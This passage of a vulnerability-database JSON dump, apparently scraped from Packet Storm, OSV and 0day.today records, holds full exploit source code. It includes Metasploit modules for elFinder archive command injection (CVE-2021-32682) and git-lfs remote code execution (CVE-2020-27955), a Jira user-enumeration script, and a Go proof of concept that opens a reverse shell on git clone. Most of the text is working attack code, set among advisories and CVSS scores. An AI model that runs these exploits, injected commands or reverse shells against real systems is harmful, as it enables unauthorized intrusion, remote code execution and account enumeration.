res.body.include?('[\"errUnknownCmd\"]') \n \nvprint_status('Attempting to check the changelog for elFinder version') \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'Changelog') \n) \n \nunless res \nreturn CheckCode::Detected('elFinder is running, but cannot detect version through the changelog') \nend \n \n# * elFinder (2.1.58) \nvers_str = res.body.match(/\\*\\s+elFinder\\s+\$(\\d+\\.\\d+\\.\\d+)\$/) \nif vers_str.nil? || vers_str.length <= 1 \nreturn CheckCode::Detected('elFinder is running, but couldn\\'t retrieve the version') \nend \n \nversion_found = Rex::Version.new(vers_str[1]) \nif version_found < Rex::Version.new('2.1.59') \nreturn CheckCode::Appears(\"elFinder running version #{vers_str[1]}\") \nend \n \nCheckCode::Safe(\"Detected elFinder version #{vers_str[1]}, which is not vulnerable\") \nend \n \ndef upload_uri \nnormalize_uri(target_uri.path, 'php', 'connector.minimal.php') \nend \n \ndef upload_successful?(response) \nunless response \nprint_bad('Did not receive a response from elFinder') \nreturn false \nend \n \nif response.code != 200 || response.body.include?('error') \nprint_bad(\"Request failed: #{response.body}\") \nreturn false \nend \n \nunless response.body.include?('added') \nprint_bad(\"Failed to add new file: #{response.body}\") \nreturn false \nend \njson = JSON.parse(response.body) \nif json['added'].empty? \nreturn false \nend \n \ntrue \nend \n \nalias archive_successful? upload_successful? \n \ndef upload_txt_file(file_name) \nfile_data = Rex::Text.rand_text_alpha(8..20) \n \ndata = Rex::MIME::Message.new \ndata.add_part('upload', nil, nil, 'form-data; name=\"cmd\"') \ndata.add_part('l1_Lw', nil, nil, 'form-data; name=\"target\"') \ndata.add_part(file_data, 'text/plain', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{file_name}\\\"\") \n \nprint_status(\"Uploading file #{file_name} to elFinder\") \nsend_request_cgi( \n'method' => 'POST', \n'uri' => upload_uri, \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => data.to_s \n) \nend \n \ndef create_archive(archive_name, *files_to_archive) \nfiles_to_archive = files_to_archive.map { |file_name| \"l1_#{Rex::Text.encode_base64(file_name)}\" } \n \nsend_request_cgi( \n'method' => 'GET', \n'uri' => upload_uri, \n'encode_params' => false, \n'vars_get' => \n{ \n'cmd' => 'archive', \n'name' => archive_name, \n'target' => 'l1_Lw', \n'type' => 'application/zip', \n'targets[]' => files_to_archive.join('&targets[]=') \n} \n) \nend \n \ndef setup_files_for_sploit \n@txt_file = \"#{Rex::Text.rand_text_alpha(5..10)}.txt\" \nres = upload_txt_file(@txt_file) \nfail_with(Failure::UnexpectedReply, 'Upload was not successful') unless upload_successful?(res) \nprint_good('Text file was successfully uploaded!') \n \n@archive_name = \"#{Rex::Text.rand_text_alpha(5..10)}.zip\" \nprint_status(\"Attempting to create archive #{@archive_name}\") \nres = create_archive(@archive_name, @txt_file) \nfail_with(Failure::UnexpectedReply, 'Archive was not created') unless archive_successful?(res) \nprint_good('Archive was successfully created!') \n \nregister_files_for_cleanup(@txt_file, @archive_name) \nend \n \n# zip -r9 -q '-TmTT=\"$(id>out.txt)foooo\".zip' './a.zip' './a.txt' - sonarsource blog post \ndef execute_command(cmd, _opts = {}) \ncmd = \"echo #{Rex::Text.encode_base64(cmd)} | base64 -d |sh\" \ncmd_arg = \"-TmTT=\\\"$(#{cmd})#{Rex::Text.rand_text_alpha(1..3)}\\\"\" \ncmd_arg = cmd_arg.gsub(' ', '${IFS}') \n \ncreate_archive(cmd_arg, @archive_name, @txt_file) \nend \n \ndef exploit \nsetup_files_for_sploit \nexecute_cmdstager(noconcat: true, linemax: 150) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164173/elfinder_archive_cmd_injection.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T16:13:34", "description": "", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "packetstorm", "title": "Atlassian JIRA 8.11.1 User Enumeration", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2021-03-10T00:00:00", "id": "PACKETSTORM:161730", "href": "https://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html", "sourceData": "`# Title: Atlassian JIRA 8.11.1 - User Enumeration \n# Author: Dolev Farhi \n# Vulnerable versions: version < 7.13.16, 8.0.0 \u2264 version < 8.5.7, 8.6.0 \u2264 version < 8.12.0 \n# CVE: CVE-2020-14181 \n# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies. \n \nimport sys \nimport os \nimport requests \n \ndef help(): \nprint('python3 script.py <target> <usernames_file>') \nprint('e.g. python3 script.py https://jiratarget.com usernames.txt') \nsys.exit() \n \nif len(sys.argv) < 3: \nhelp() \n \nserver = sys.argv[1] \nusernames = sys.argv[2] \n \nrandom_user = '0x00001' \n \ntry: \nos.path.exists(usernames) \nexcept: \nprint(usernames, 'file does not exist.') \nsys.exit(1) \n \ndef test_vulnerable(): \nresp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username)) \nif 'User does not exist: {}'.format(random_user) in resp.text: \nreturn True \nreturn False \n \nif test_vulnerable is False: \nprint('server is not vulnerable.') \nsys.exit(1) \n \nf = open(usernames, 'r').read() \n \nfor username in f.splitlines(): \nresp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username)) \nif 'User does not exist' not in resp.text: \nprint('EXISTS', username) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161730/atlassianjira8111-enumerate.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-16T16:20:32", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "packetstorm", "title": "Git git-lfs Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-16T00:00:00", "id": "PACKETSTORM:164180", "href": "https://packetstormsecurity.com/files/164180/Git-git-lfs-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Git \ninclude Msf::Exploit::Git::Lfs \ninclude Msf::Exploit::Git::SmartHttp \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Git Remote Code Execution via git-lfs (CVE-2020-27955)', \n'Description' => %q{ \nA critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for \nversioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked \ninto cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool \n}, \n'Author' => [ \n'Dawid Golunski ', # Discovery \n'space-r7', # Guidance, git mixins \n'jheysel-r7' # Metasploit module \n], \n'References' => [ \n['CVE', '2020-27955'], \n['URL', 'https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/'] \n], \n'DisclosureDate' => '2020-11-04', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Git LFS <= 2.12', \n{ \n'Platform' => ['win'] \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'WfsDelay' => 10 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nARTIFACTS_ON_DISK \n] \n} \n) \n) \n \nregister_options([ \nOptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ]) \n]) \nderegister_options('RHOSTS') \nend \n \ndef setup_repo_structure \npayload_fname = 'git.exe' \n@hook_payload = generate_payload_exe \n \nptr_file = generate_pointer_file(@hook_payload) \ngit_payload_ptr = GitObject.build_blob_object(ptr_file) \n \ngit_attr_fname = '.gitattributes' \ngit_attr_content = \"#{payload_fname} filter=lfs diff=lfs merge=lfs\" \ngit_attr_obj = GitObject.build_blob_object(git_attr_content) \n \nregister_dir_for_cleanup('.git') \nregister_files_for_cleanup(git_attr_fname) \n \n# root of repository \ntree_ent = \n[ \n{ \nmode: '100644', \nfile_name: git_attr_fname, \nsha1: git_attr_obj.sha1 \n}, \n{ \nmode: '100755', \nfile_name: payload_fname, \nsha1: git_payload_ptr.sha1 \n} \n] \n \ntree_obj = GitObject.build_tree_object(tree_ent) \ncommit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1) \n \n@git_objs = \n[ \ncommit, tree_obj, git_attr_obj, git_payload_ptr \n] \n \n@refs = \n{ \n'HEAD' => 'refs/heads/master', \n'refs/heads/master' => commit.sha1 \n} \nend \n \n# \n# Determine whether or not the target is exploitable based on the User-Agent header returned from the client. \n# The git version must be equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0 to be \n# exploitable by this vulnerability. \n# \n# Returns +true+ if the target is suitable, else fail_with descriptive message \n# \ndef target_suitable?(user_agent) \ninfo = fingerprint_user_agent(user_agent) \nif info[:ua_name] == Msf::HttpClients::UNKNOWN \nfail_with(Failure::NoTarget, \"The client's User-Agent string was unidentifiable: #{info}. The client needs to clone the malicious repo on windows with a git version less than 2.29.0\") \nend \n \nif info[:os_name] == 'Windows' && \n((info[:ua_name] == Msf::HttpClients::GIT && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.29.2')) || \n(info[:ua_name] == Msf::HttpClients::GIT_LFS && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.12'))) \ntrue \nelse \nfail_with(Failure::NotVulnerable, \"The git client needs to be running on Windows with a version equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0. The user agent, #{info[:ua_name]}, found was running on, #{info[:os_name]} and was at version: #{info[:ua_ver]}\") \nend \nend \n \ndef on_request_uri(cli, req) \ntarget_suitable?(req.headers['User-Agent']) \nif req.uri.include?('git-upload-pack') \nrequest = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req) \ncase request.type \nwhen 'ref-discovery' \nresponse = send_refs(request) \nwhen 'upload-pack' \nresponse = send_requested_objs(request) \nelse \nfail_with(Failure::UnexpectedReply, 'Git client did not send a valid request') \nend \nelse \nresponse = handle_lfs_objects(req, @hook_payload, @git_addr) \nunless response.code == 200 \ncli.send_response(response) \nfail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\\'s LFS request') \nend \nend \ncli.send_response(response) \nend \n \ndef create_git_uri \n\"/#{Faker::App.name.downcase}.git\".gsub(' ', '-') \nend \n \ndef primer \n@git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI'] \n@git_addr = URI.parse(get_uri).merge(@git_repo_uri) \nprint_status(\"Git repository to clone: #{@git_addr}\") \nhardcoded_uripath(@git_repo_uri) \nhardcoded_uripath(\"/#{Digest::SHA256.hexdigest(@hook_payload)}\") \nend \n \ndef handle_lfs_objects(req, hook_payload, git_addr) \ngit_hook_obj = GitObject.build_blob_object(hook_payload) \n \ncase req.method \nwhen 'POST' \nprint_status('Sending payload data...') \nresponse = get_batch_response(req, git_addr, git_hook_obj) \nfail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response \nwhen 'GET' \nprint_status('Sending LFS object...') \nresponse = get_requested_obj_response(req, git_hook_obj) \nfail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response \nelse \nfail_with(Failure::UnexpectedReply, 'Unable to handle client\\'s request') \nend \n \nresponse \nend \n \ndef send_refs(req) \nfail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack' \n \nresponse = get_ref_discovery_response(req, @refs) \nfail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response \n \nresponse \nend \n \ndef send_requested_objs(req) \nupload_pack_resp = get_upload_pack_response(req, @git_objs) \nunless upload_pack_resp \nfail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response') \nend \n \nupload_pack_resp \nend \n \ndef exploit \nsetup_repo_structure \nsuper \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164180/git_lfs_rce.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-06T15:53:27", "description": "", "cvss3": {}, "published": "2020-11-06T00:00:00", "type": "packetstorm", "title": "git-lfs Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-06T00:00:00", "id": "PACKETSTORM:159923", "href": "https://packetstormsecurity.com/files/159923/git-lfs-Remote-Code-Execution.html", "sourceData": "`/* \nGo PoC exploit for git-lfs - Remote Code Execution (RCE) \nvulnerability CVE-2020-27955 \ngit-lfs-RCE-exploit-CVE-2020-27955.go \n \nDiscovered by Dawid Golunski \nhttps://legalhackers.com \nhttps://exploitbox.io \n \n \nAffected (RCE exploit): \nGit / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken / \nSmartGit / SourceTree etc. \nBasically the whole Windows dev world which uses git. \n \nUsage: \nCompile: go build git-lfs-RCE-exploit-CVE-2020-27955.go \nSave & commit as git.exe \n \nThe payload should get executed automatically on git clone operation. \nIt spawns a reverse shell, or a calc.exe for testing (if it \ncouldn't connect). \n \nAn lfs-enabled repository with lfs files may also be needed so that git-lfs \ngets invoked. This can be achieved with: \n \ngit lfs track \"*.dat\" \necho \"fat bug file\" > lfsdata.dat \ngit add .* \ngit add * \ngit commmit -m 'git-lfs exploit' -a \n \nCheck out the full advisory for details: \n \nhttps://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html \n \nhttps://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html \n \nPoC video at: \nhttps://youtu.be/tlptOf9w274 \n \n** For testing purposes only ** \n \n \n*/ \n \npackage main \nimport ( \n\"net\" \n\"os/exec\" \n\"bufio\" \n\"syscall\" \n) \n \n \nfunc revsh(host string) { \n \nc, err := net.Dial(\"tcp\", host) \nif nil != err { \n// Conn failed \nif nil != c { \nc.Close() \n} \n// Calc for testing purposes if no listener available \ncmd := exec.Command(\"calc\") \ncmd.Run() \nreturn \n} \n \nr := bufio.NewReader(c) \nfor { \nruncmd, err := r.ReadString('\\n') \nif nil != err { \nc.Close() \nreturn \n} \ncmd := exec.Command(\"cmd\", \"/C\", runcmd) \ncmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} \nout, _ := cmd.CombinedOutput() \nc.Write(out) \n} \n} \n \n// Connect to netcat listener on local port 1337 \nfunc main() { \nrevsh(\"localhost:1337\") \n} \n \n \n-- \nRegards, \nDawid Golunski \nhttps://legalhackers.com \nhttps://ExploitBox.io \nt: @dawid_golunski \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159923/git-lfs-RCE-exploit-CVE-2020-27955.go.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2022-08-11T00:31:12", "description": "### Impact\n\nWe recently fixed several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with the minimal configuration. \n\n### Patches\n\nThe issues were addressed in our last release, 2.1.59. \n\n### Workarounds\n\nIf you can't update to 2.1.59, make sure your connector is not exposed without authentication.\n\n### Reference\n\nFurther technical details will be disclosed on https://blog.sonarsource.com/tag/security after some time.\n\n### For more information\n\nIf you have any questions or comments about this advisory, you can contact:\n - The original reporters, by sending an email to vulnerability.research@sonarsource.com;\n - The maintainers, by opening an issue on this repository.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T17:04:29", "type": "osv", "title": "elFinder before 2.1.59 contains multiple vulnerabilities leading to RCE", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2022-08-11T00:02:01", "id": "OSV:GHSA-WPH3-44RJ-92PR", "href": "https://osv.dev/vulnerability/GHSA-wph3-44rj-92pr", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T20:43:33", "description": "### Impact\nOn Windows, if Git LFS operates on a malicious repository with a `git.bat` or `git.exe` file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\n\nThis occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\n\n### Patches\nThis version should be patched in v2.12.1, which will be released in coordination with this security advisory.\n\n### Workarounds\nOther than avoiding untrusted repositories, there is no workaround.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).\n* If you cannot open a discussion, please email the core team using their usernames at `github.com`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-11T23:39:18", "type": "osv", "title": "Git LFS can execute a Git binary from the current directory", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-04-20T16:25:04", "id": "OSV:GHSA-4G4P-42WC-9F3M", "href": "https://osv.dev/vulnerability/GHSA-4g4p-42wc-9f3m", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T20:43:33", "description": "### Impact\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\n\nThis is the result of an incomplete fix for CVE-2020-27955.\n\nThis issue occurs because on Windows, [Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator](https://github.com/golang/go/issues/38736).\n\n### Patches\nThis version should be patched in v2.13.2, which will be released in coordination with this security advisory.\n\n### Workarounds\nOther than avoiding untrusted repositories or using a different operating system, there is no workaround.\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n- Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).\n- If you cannot open a discussion, please email the core team using their usernames at `github.com`.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T00:30:37", "type": "osv", "title": "Git LFS can execute a Git binary from the current directory on Windows", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2022-04-20T16:24:41", "id": "OSV:GHSA-CX3W-XQMC-84G5", "href": "https://osv.dev/vulnerability/GHSA-cx3w-xqmc-84g5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-27T01:18:40", "description": "elFinder versions below 2.1.59 are vulnerable to a command injection vulnerability via its archive functionality. When creating a new zip archive, the name parameter is sanitized with the escapeshellarg() php function and then passed to the zip utility. Despite the sanitization, supplying the -TmTT argument as part of the name parameter is still permitted and enables the execution of arbitrary commands as the www-data user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "zdt", "title": "elFinder Archive Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2021-09-15T00:00:00", "id": "1337DAY-ID-36761", "href": "https://0day.today/exploit/description/36761", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'elFinder Archive Command Injection',\n 'Description' => %q{\n elFinder versions below 2.1.59 are vulnerable to a command injection\n vulnerability via its archive functionality.\n\n When creating a new zip archive, the `name` parameter is sanitized\n with the `escapeshellarg()` php function and then passed to the\n `zip` utility. Despite the sanitization, supplying the `-TmTT`\n argument as part of the `name` parameter is still permitted and\n enables the execution of arbitrary commands as the `www-data` user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Thomas Chauchefoin', # Discovery\n 'Shelby Pace' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-32682' ],\n [ 'URL', 'https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities' ]\n ],\n 'Platform' => [ 'linux' ],\n 'Privileged' => false,\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Targets' => [\n [\n 'Automatic Target',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'CmdStagerFlavor' => [ 'wget' ],\n 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2021-06-13',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n }\n )\n )\n\n register_options([ OptString.new('TARGETURI', [ true, 'The URI of elFinder', '/' ]) ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => upload_uri\n )\n\n return CheckCode::Unknown('Failed to retrieve a response') unless res\n return CheckCode::Safe('Failed to detect elFinder') unless res.body.include?('[\"errUnknownCmd\"]')\n\n vprint_status('Attempting to check the changelog for elFinder version')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'Changelog')\n )\n\n unless res\n return CheckCode::Detected('elFinder is running, but cannot detect version through the changelog')\n end\n\n # * elFinder (2.1.58)\n vers_str = res.body.match(/\\*\\s+elFinder\\s+\$(\\d+\\.\\d+\\.\\d+)\$/)\n if vers_str.nil? || vers_str.length <= 1\n return CheckCode::Detected('elFinder is running, but couldn\\'t retrieve the version')\n end\n\n version_found = Rex::Version.new(vers_str[1])\n if version_found < Rex::Version.new('2.1.59')\n return CheckCode::Appears(\"elFinder running version #{vers_str[1]}\")\n end\n\n CheckCode::Safe(\"Detected elFinder version #{vers_str[1]}, which is not vulnerable\")\n end\n\n def upload_uri\n normalize_uri(target_uri.path, 'php', 'connector.minimal.php')\n end\n\n def upload_successful?(response)\n unless response\n print_bad('Did not receive a response from elFinder')\n return false\n end\n\n if response.code != 200 || response.body.include?('error')\n print_bad(\"Request failed: #{response.body}\")\n return false\n end\n\n unless response.body.include?('added')\n print_bad(\"Failed to add new file: #{response.body}\")\n return false\n end\n json = JSON.parse(response.body)\n if json['added'].empty?\n return false\n end\n\n true\n end\n\n alias archive_successful? upload_successful?\n\n def upload_txt_file(file_name)\n file_data = Rex::Text.rand_text_alpha(8..20)\n\n data = Rex::MIME::Message.new\n data.add_part('upload', nil, nil, 'form-data; name=\"cmd\"')\n data.add_part('l1_Lw', nil, nil, 'form-data; name=\"target\"')\n data.add_part(file_data, 'text/plain', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{file_name}\\\"\")\n\n print_status(\"Uploading file #{file_name} to elFinder\")\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => upload_uri,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s\n )\n end\n\n def create_archive(archive_name, *files_to_archive)\n files_to_archive = files_to_archive.map { |file_name| \"l1_#{Rex::Text.encode_base64(file_name)}\" }\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => upload_uri,\n 'encode_params' => false,\n 'vars_get' =>\n {\n 'cmd' => 'archive',\n 'name' => archive_name,\n 'target' => 'l1_Lw',\n 'type' => 'application/zip',\n 'targets[]' => files_to_archive.join('&targets[]=')\n }\n )\n end\n\n def setup_files_for_sploit\n @txt_file = \"#{Rex::Text.rand_text_alpha(5..10)}.txt\"\n res = upload_txt_file(@txt_file)\n fail_with(Failure::UnexpectedReply, 'Upload was not successful') unless upload_successful?(res)\n print_good('Text file was successfully uploaded!')\n\n @archive_name = \"#{Rex::Text.rand_text_alpha(5..10)}.zip\"\n print_status(\"Attempting to create archive #{@archive_name}\")\n res = create_archive(@archive_name, @txt_file)\n fail_with(Failure::UnexpectedReply, 'Archive was not created') unless archive_successful?(res)\n print_good('Archive was successfully created!')\n\n register_files_for_cleanup(@txt_file, @archive_name)\n end\n\n # zip -r9 -q '-TmTT=\"$(id>out.txt)foooo\".zip' './a.zip' './a.txt' - sonarsource blog post\n def execute_command(cmd, _opts = {})\n cmd = \"echo #{Rex::Text.encode_base64(cmd)} | base64 -d |sh\"\n cmd_arg = \"-TmTT=\\\"$(#{cmd})#{Rex::Text.rand_text_alpha(1..3)}\\\"\"\n cmd_arg = cmd_arg.gsub(' ', '${IFS}')\n\n create_archive(cmd_arg, @archive_name, @txt_file)\n end\n\n def exploit\n setup_files_for_sploit\n execute_cmdstager(noconcat: 